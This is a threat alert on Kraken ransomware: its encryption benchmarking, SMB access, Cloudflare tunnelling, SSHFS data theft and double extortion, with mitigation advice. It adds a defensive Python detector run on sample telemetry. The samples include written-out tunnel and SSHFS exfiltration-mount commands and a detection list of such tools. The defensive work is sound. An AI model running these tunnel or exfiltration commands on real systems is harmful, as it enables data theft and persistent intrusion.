Kraken ransomware uses benchmarking to optimize big-game attacks
Category: Threat Alerts
Kraken ransomware introduces a novel benchmarking phase in its attack chain: before locking files, it measures how quickly the victim system can process encryption workloads. The chain maps closely to ATT&CK techniques such as T1133 (External Remote Services), T1021.001 (Remote Desktop Protocol), T1486 (Data Encrypted for Impact) and T1041 (Exfiltration Over C2 Channel). Emerging from the remnants of the HelloKitty cartel, this Russian-speaking operation has conducted big-game hunting campaigns across Windows, Linux and VMware ESXi environments. Cisco Talos observed Kraken abusing exposed SMB services for initial access, then using Cloudflare-based tunneling for persistence and SSHFS for data theft before launching the encryptor.

The benchmarking step lets Kraken operators adapt the encryption strategy to the underlying hardware and workload, choosing parameters that maximize damage while limiting the risk of system instability or conspicuous performance anomalies that could expose the attack before it completes. Multi-threaded modules target SQL databases, network shares, local drives and virtual machines in parallel, while exfiltrated data is staged for double extortion on a leak site branded with references to HelloKitty and a new forum called The Last Haven Board. Ransoms reportedly reach around one million dollars in Bitcoin, with victims across the United States, the United Kingdom, Canada, Denmark, Panama and Kuwait.

For businesses, Kraken exemplifies how ransomware groups are optimizing not only initial access but also the impact phase, tuning encryption to complete quickly and reliably across hybrid environments. That raises the chance of complete operational disruption while the stolen data preserves the attackers' leverage, intensifying regulatory exposure under GDPR, HIPAA or sectoral rules when sensitive customer or health records are involved.
The overlap with HelloKitty also suggests that experienced operators and tooling are being recycled into the new brand, shortening the maturation cycle for Kraken as a major ransomware player. Mitigation should prioritize closing external SMB and RDP exposure, enforcing strong authentication and lockout policies on any remaining remote services, and hardening backups against tampering. Detection teams should look for anomalous use of Cloudflare tunnels, SSHFS-based file system access, and the footprint the benchmark itself is likely to leave: a short burst of heavy read/write activity against a handful of files by an unfamiliar process, followed within minutes by a spike in file modifications and renames across many directories. Relevant techniques include T1046 (Network Service Discovery), T1021.001 and T1486. Organizations should also maintain offline and immutable backups, test restore procedures regularly and prepare communication and legal workflows for double extortion scenarios where data theft and encryption occur together.
CORTEX Protocol Intelligence Assessment
Business Impact: Kraken’s benchmarking-driven encryption increases the reliability and speed of ransomware deployment across servers, databases and virtual infrastructure, raising the likelihood of full production outages and costly recovery efforts. The group’s double extortion model and global victim set mean that breaches can quickly escalate into regulatory incidents and reputational damage, particularly where customer or operational data is exfiltrated before encryption.
Strategic Intelligence Guidance
- Inventory and close unnecessary external-facing SMB and RDP services, enforcing MFA and strict access control on any remote management exposure that must remain.
- Deploy detections for Cloudflare-based tunneling, SSHFS usage and abnormal high-volume file access patterns that may indicate staging for encryption or exfiltration.
- Harden and regularly test backup and restore processes, ensuring the existence of offline or immutable backups that cannot be altered or deleted even with the domain or backup-administrator credentials a ransomware operator has captured.
- Rehearse response to double extortion incidents, including legal review, regulator notification paths and decision frameworks for ransom negotiations or refusal.
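One way to operationalize the detection guidance above (Cloudflare tunnels, SSHFS usage, and a benchmark-like burst that precedes mass file modification) is sketched below. This is an added example, not code from Cisco Talos, from the Kraken operators or from the original alert. It runs over a constructed, simplified event stream in an EDR/Sysmon-like shape; the field names (`type`, `host`, `pid`, `image`, `cmdline`, `path`, `bytes`), the binary names, the thresholds and the window sizes are all assumptions to be tuned against your own telemetry, not Kraken indicators.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Names and thresholds below are assumptions for this example, not published Kraken IOCs.
SUSPECT_BINARIES = {"cloudflared": "cloudflared_tunnel", "cloudflared.exe": "cloudflared_tunnel",
                    "sshfs": "sshfs_mount", "sshfs.exe": "sshfs_mount"}
BENCH_WINDOW, BENCH_MIN_BYTES, BENCH_MAX_FILES = timedelta(seconds=30), 64 << 20, 4  # burst, few files
FOLLOW_WINDOW, SPIKE_WINDOW = timedelta(minutes=10), timedelta(seconds=60)  # spike must follow soon
SPIKE_MIN_FILES, SPIKE_MIN_DIRS = 200, 20  # spike: many files across many directories

def _ts(event): return datetime.fromisoformat(event["ts"])

def _split_path(path):  # (directory, lowercase basename) for Windows or POSIX paths
    directory, _, name = path.replace("\\", "/").rpartition("/")
    return directory, name.lower()

def detect_remote_tooling(events):
    """Flag launches of tunnelling (cloudflared) and exfiltration (sshfs) tooling."""
    findings = []
    for e in events:
        if e["type"] != "process":
            continue
        rule = SUSPECT_BINARIES.get(_split_path(e["image"])[1])
        if rule:
            findings.append({"rule": rule, "host": e["host"], "pid": e["pid"],
                             "cmdline": e["cmdline"]})
    return findings

def _time_windows(evs, width):
    """Yield (i, j) such that evs[i:j] spans at most `width`; evs must be time-sorted."""
    j = 0
    for i in range(len(evs)):
        while j < len(evs) and _ts(evs[j]) - _ts(evs[i]) <= width:
            j += 1
        yield i, j

def find_benchmark_end(evs):
    """End time of the first benchmark-like burst in one process's file events, or None."""
    for i, j in _time_windows(evs, BENCH_WINDOW):
        window = evs[i:j]
        if (len({e["path"] for e in window}) <= BENCH_MAX_FILES
                and sum(e.get("bytes", 0) for e in window) >= BENCH_MIN_BYTES):
            return _ts(window[-1])
    return None

def find_spike_start(evs, after, before):
    """Start of the first mass-modification window among events timestamped in (after, before]."""
    cand = [e for e in evs if after < _ts(e) <= before]
    for i, j in _time_windows(cand, SPIKE_WINDOW):
        window = cand[i:j]
        if (len({e["path"] for e in window}) >= SPIKE_MIN_FILES
                and len({_split_path(e["path"])[0] for e in window}) >= SPIKE_MIN_DIRS):
            return _ts(window[0])
    return None

def detect_bench_then_spike(events):
    """Per (host, pid): a benchmark burst followed within FOLLOW_WINDOW by a modification spike."""
    per_proc = defaultdict(list)
    for e in events:
        if e["type"] == "file":
            per_proc[(e["host"], e["pid"])].append(e)
    findings = []
    for (host, pid), evs in per_proc.items():
        evs.sort(key=_ts)
        bench_end = find_benchmark_end(evs)
        spike = bench_end and find_spike_start(evs, bench_end, bench_end + FOLLOW_WINDOW)
        if spike:
            findings.append({"rule": "benchmark_then_mass_modify", "host": host, "pid": pid,
                             "benchmark_end": bench_end.isoformat(), "spike_start": spike.isoformat()})
    return findings

def sample_events():
    """Constructed sample telemetry for this example, not real Kraken artifacts."""
    t0 = datetime(2025, 11, 18, 3, 0, 0)
    ev = [{"type": "process", "host": "srv01", "pid": 4100, "ts": t0.isoformat(),
           "image": "C:\\Users\\Public\\cloudflared.exe",
           "cmdline": "cloudflared.exe tunnel run --token <redacted>"},
          {"type": "process", "host": "fs01", "pid": 2207, "image": "/usr/bin/sshfs",
           "ts": (t0 + timedelta(minutes=2)).isoformat(),
           "cmdline": "sshfs op@203.0.113.10:/in /mnt/stage -o reconnect"},
          {"type": "process", "host": "fs01", "pid": 2300, "image": "/usr/bin/rsync",  # benign
           "ts": (t0 + timedelta(minutes=3)).isoformat(), "cmdline": "rsync -a /srv /backup"}]
    def fev(host, pid, ts, path, nbytes):
        return {"type": "file", "host": host, "pid": pid, "ts": ts.isoformat(),
                "path": path, "bytes": nbytes}
    b0 = t0 + timedelta(minutes=5)  # benchmark: 4 x 32 MiB through 2 temp files within 15 s
    ev += [fev("fs01", 3131, b0 + timedelta(seconds=5 * k), f"/tmp/.b{k % 2}", 32 << 20)
           for k in range(4)]
    s0 = b0 + timedelta(minutes=3)  # the same process then touches 300 files in 30 dirs in 45 s
    ev += [fev("fs01", 3131, s0 + timedelta(milliseconds=150 * k),
               f"/srv/share/dept{k % 30}/doc{k}.xlsx", 4096) for k in range(300)]
    ev += [fev("bak01", 777, t0 + timedelta(milliseconds=150 * k),  # benign bulk job: many files
               f"/backup/dept{k % 30}/doc{k}.xlsx", 4096) for k in range(300)]  # but no benchmark
    return ev

if __name__ == "__main__":
    EVENTS = sample_events()
    print(*detect_remote_tooling(EVENTS) + detect_bench_then_spike(EVENTS), sep="\n")
```

Run against the constructed stream, the first detector flags the `cloudflared.exe` and `sshfs` launches but not `rsync`, and the second flags only `fs01` pid 3131, where a 128 MiB burst through two temp files ends at 03:05:15 and a 300-file spike across 30 directories starts at 03:08:00; the `bak01` bulk job touches just as many files but never shows the benchmark burst, so it is not reported. Two caveats a practitioner would want: the benchmark-then-spike correlation is per process, so an encryptor that benchmarks in one process and encrypts in another needs a host-level join instead, and legitimate database or backup software can produce both patterns, so the thresholds should be baselined per host class before alerting.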
Impact
Financial: around $1,000,000 ransom demands reported
Intelligence Source: Kraken ransomware uses benchmarking to optimize big-game attacks | Nov 18, 2025